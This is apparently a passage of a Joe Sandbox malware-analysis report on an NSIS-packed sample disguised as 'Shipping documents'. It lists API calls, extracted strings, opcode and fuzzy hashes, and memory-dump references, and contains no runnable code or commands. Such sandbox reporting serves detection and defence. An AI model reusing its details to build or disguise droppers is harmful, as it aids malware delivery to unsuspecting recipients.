Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
Instruction ID: 3caf73f0ff98a748f1a35ad4b0faf92cdaa7f83aa24985268d6d9c0dc650f438
Opcode Fuzzy Hash: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
Instruction Fuzzy Hash: C93105B12012117AE7206B258D99FAB3A5CEF45748F16053AF903F62D3E63D9C11867C

Function 00402BA3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
GlobalFree.KERNEL32(?), ref: 00402C7E
GlobalFree.KERNEL32(00000000), ref: 00402C94
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4

Strings

C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00402CD3

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
API String ID: 2667972263-2461694523
Opcode ID: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
Instruction ID: 23d93ea21af668beabbcb9178b0b7634ed911faf56d8c64a437eebf92f001ab7
Opcode Fuzzy Hash: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
Instruction Fuzzy Hash: B2310471508351ABD310AF65CD48E1FBBE8AF89714F100A3EF5A1772D2C37899018BAA

Function 00406D3D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DB2
CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DC6
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DDE

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D44
*?|<>/":, xrefs: 00406DA1
C:\Users\user\AppData\Local\Temp\, xrefs: 00406D3D, 00406D3F

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-879122614
Opcode ID: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
Instruction ID: 9b03febb742ef4485f2caa0616bf8b5dba6ff04d2a2b11022b5674ddd7f14081
Opcode Fuzzy Hash: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
Instruction Fuzzy Hash: 4E110211B0022566DA306B2A9C4097B72E8DFA9761746443BF9C6A32C0F77D8CA1D2B8

Function 73471A8F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49libraryloaderstringCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 73471A97
GetModuleHandleA.KERNEL32(KERNEL32), ref: 73471AA4
lstrcpyA.KERNEL32(?,IsWow64Process2), ref: 73471AB5
GetProcAddress.KERNEL32(00000000,?), ref: 73471AC0
GetProcAddress.KERNEL32(00000000,?), ref: 73471AED

Strings

KERNEL32, xrefs: 73471A9D
IsWow64Process2, xrefs: 73471AAF

Memory Dump Source

Source File: 00000000.00000002.2072565385.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.2072539056.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2072595276.0000000073472000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2072657037.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: AddressProc$CurrentHandleModuleProcesslstrcpy
String ID: IsWow64Process2$KERNEL32
API String ID: 145496639-1019154776
Opcode ID: e2b5b2d42c8666c1ff621e1d0e6d83e1f1a817f887966d4b0ebf1b5570ff2cfe
Instruction ID: b93aaa2384947b5964c879ec492e020f63b133cf57dfd07910a85ae3d8ec3d50
Opcode Fuzzy Hash: e2b5b2d42c8666c1ff621e1d0e6d83e1f1a817f887966d4b0ebf1b5570ff2cfe
Instruction Fuzzy Hash: 19014F7260024AABDB09FBB5CC49FFF7BBCEF44101F100055EA06E2140EB24D645C6B5

Function 73471000 Relevance: 12.1, APIs: 8, Instructions: 103processstringsynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000400), ref: 73471031
lstrcpynW.KERNEL32(?,00000000), ref: 7347103D
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 734710C6
WaitForSingleObject.KERNEL32(?,000000FF), ref: 734710DA
GetExitCodeProcess.KERNEL32(?,?), ref: 734710E9
CloseHandle.KERNEL32(?), ref: 734710F9
CloseHandle.KERNEL32(?), ref: 734710FF
ExitProcess.KERNEL32 ref: 73471105

Memory Dump Source

Source File: 00000000.00000002.2072565385.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.2072539056.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2072595276.0000000073472000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2072657037.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Process$CloseExitHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
String ID:
API String ID: 3065505172-0
Opcode ID: 4fa33c4e264fed3e2cc5864cb62a20ec4536e535640f6f0157f8fb99ab75fdb8
Instruction ID: cf83bc489a9defd4645894e81f7f87050cd8c92e3e65e25f2c411753b41caa11
Opcode Fuzzy Hash: 4fa33c4e264fed3e2cc5864cb62a20ec4536e535640f6f0157f8fb99ab75fdb8
Instruction Fuzzy Hash: EF31F5B2504399AFD7199B55CC44FEB3BFDEB48790F10081AF286E6190D620C944C775

Function 0040575B Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405778
GetSysColor.USER32 ref: 004057B1
SetTextColor.GDI32(?), ref: 004057C4
SetBkMode.GDI32(?,?), ref: 004057D0
GetSysColor.USER32(?), ref: 004057E4
SetBkColor.GDI32(?,?), ref: 004057FA
DeleteObject.GDI32(?), ref: 00405816
CreateBrushIndirect.GDI32(?), ref: 00405820

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
Instruction ID: d6878141ad4b6a1f495ba237af706d2ee8e98f75713b616aff0e98366caa8665
Opcode Fuzzy Hash: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
Instruction Fuzzy Hash: 64210775600B059FDB34AF28E94895B7BF8EF05710700CA3AE896A27A1D735EC14CF58

Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC

Strings

9, xrefs: 00402975

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$ByteCharMultiPointerWide$Read
String ID: 9
API String ID: 1439708474-2366072709
Opcode ID: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
Instruction ID: c0364eb4a24137c8a00bba018ae5694ccc63d4c43f2b92d4ab62ccb683855c39
Opcode Fuzzy Hash: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
Instruction Fuzzy Hash: FD513B71618301AFD724DF11CA48A2BB7E8BFD5304F00483FF985A62D1DBB9D9458B66

Function 004056DA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056F3
GetMessagePos.USER32 ref: 004056FB
ScreenToClient.USER32(?,?), ref: 00405715
SendMessageW.USER32(?,00001111,00000000,?), ref: 00405729
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405751

Strings

f, xrefs: 0040572B

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
Instruction ID: c2e7ed3a8a7ffde0c91d4cd6f33517ea70e65294e07f2b992d5a249d380e7f5b
Opcode Fuzzy Hash: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
Instruction Fuzzy Hash: 01014C7190020DBBEB119FA4CC45BEEBBB9EB44720F104226FA51B61E0D7B59A419F54

Function 0040364F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040366D
MulDiv.KERNEL32(00107F18,00000064,00107F18), ref: 00403695
wsprintfW.USER32 ref: 004036A5
SetWindowTextW.USER32(?,?), ref: 004036B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036C7

Strings

verifying installer: %d%%, xrefs: 0040369F

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: a45adb16feadd7563508c9bdb29ee39ed6203ff3f9d3482269176a8409c36fca
Instruction ID: 5c883eac817cb3b9f0e850005900bd2bca04ae763b88d1ec11a0ecb90196ae4f
Opcode Fuzzy Hash: a45adb16feadd7563508c9bdb29ee39ed6203ff3f9d3482269176a8409c36fca
Instruction Fuzzy Hash: 87013671940209BBDF249FA0DD49FAA3B78A700705F008439F606B51E1DBB59A55CF59

Function 00405560 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(perchlorination: Installing,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,perchlorination: Installing,?,?,?,?,?), ref: 0040561F
wsprintfW.USER32 ref: 0040562C
SetDlgItemTextW.USER32(?,perchlorination: Installing), ref: 00405643

Strings

perchlorination: Installing, xrefs: 004055F3, 004055F8, 0040561E, 00405635
%u.%u%s%s, xrefs: 00405619

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$perchlorination: Installing
API String ID: 3540041739-3319793313
Opcode ID: 6fe9c990381cc4b93cba0025ee8d74cf264b947145ebdc280f7d8df25bcd82a5
Instruction ID: ddca7360d09b2edd05df8fb08f039e75c7842db061d31d06a5ac0fb1d0c25846
Opcode Fuzzy Hash: 6fe9c990381cc4b93cba0025ee8d74cf264b947145ebdc280f7d8df25bcd82a5
Instruction Fuzzy Hash: 072106337402242BD724A9799C40FAB729DDBC1364F01473AFD6AF31D1E9399C1885A4

Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
RegCloseKey.ADVAPI32(?), ref: 004014DC
RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401507

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
Instruction ID: 21b5a5252aa063403de6f9026dc2c812d9767c74370f87ead0cd0c39fa3adcf8
Opcode Fuzzy Hash: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
Instruction Fuzzy Hash: 3F218032108244BBD7219F51DC08FABBBADEFD9344F01043AF989A11B0D3399A14DA6A

Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401F03
GetClientRect.USER32(00000000,?), ref: 00401F4D
LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
DeleteObject.GDI32(00000000), ref: 00401FA1

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
Instruction ID: 799bb538699f0f6bb00644a204e03bb935fb5af8a8b8547909695eab986b8c59
Opcode Fuzzy Hash: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
Instruction Fuzzy Hash: 2A218072609302AFD340DF64DD85A6BB7E8EB88305F04093EF945E62A1D678DD40DB5A

Function 00401FB8 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00401FB9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
ReleaseDC.USER32(?,00000000), ref: 00401FEB

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070

